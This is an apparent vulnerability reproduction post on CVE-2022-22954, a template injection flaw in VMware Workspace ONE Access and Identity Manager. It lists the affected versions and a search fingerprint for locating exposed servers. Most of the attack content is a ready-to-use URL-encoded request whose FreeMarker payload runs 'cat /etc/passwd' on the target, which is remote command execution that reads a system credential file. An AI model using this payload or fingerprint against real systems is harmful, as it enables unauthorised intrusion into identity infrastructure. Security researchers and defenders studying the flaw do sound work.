Vmware Workspace One Access Ssti Vulnerability Cve 2022 22954
Vmware Workspace One Access Ssti Vulnerability Cve 2022 22954
VMware Workspace ONE Access SSTI Vulnerability CVE-2022-22954
Vulnerability Description
VMware Workspace ONE Access (formerly known as VMware Identity Manager) is designed to give your employees faster access to SaaS, Web, and native mobile applications with multi-factor authentication, conditional access, and single sign-on.
Vulnerability Impact
VMware Workspace ONE Access Appliance (version number: 20.10.0.0, 20.10.0.1, 21.08.0.0, 21.08.0.1)
VMware Identity Manager Appliance (version number: 3.3.3, 3.3.4, 3.3.5, 3.3.6)
VMware Realize Automation (version number: 7.6)
Network surveying and mapping
app=”vmware-Workspace-ONE-Access”
Vulnerability reappears
Login page
Verify POC
1
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
This post is licensed under CC BY 4.0 by the author.